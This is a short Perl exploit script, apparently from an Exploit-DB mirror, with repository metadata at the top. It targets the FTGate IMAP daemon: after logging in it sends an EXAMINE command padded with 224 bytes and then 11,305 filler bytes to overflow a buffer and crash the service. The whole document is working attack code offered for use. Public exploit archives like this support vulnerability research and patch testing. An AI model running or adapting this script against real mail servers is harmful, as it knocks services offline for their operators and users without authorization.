exploit-db-mirror/exploits/windows/dos/1327.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

37 lines
No EOL
686 B
Perl
Executable file

#!/usr/bin/perl
use IO::Socket;
print "\nFTGate Imapd BufferOverrun\nLuca Ercoli io\@lucaercoli.it\n";
print "http://www.lucaercoli.it\n\n\n";
$host = "localhost";
$remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "143",
);
unless ($remote) { die "Can't connect to $host" }
print "[!] Connected\n";
print "[?] Exploiting...\n";
sleep(1);
my $imapd = join ("", "1 login user pass", "\r\n");
print $remote $imapd;
sleep(1);
my $imapd = join ("", "1 EXAMINE ", "B"x(224), "\r\n");
print $remote $imapd;
sleep(1);
my $imapd = join ("","C"x(11305), "\r\n");
print $remote $imapd;
print "\n[!] Done\n\n\n";
close $remote;
# milw0rm.com [2005-11-16]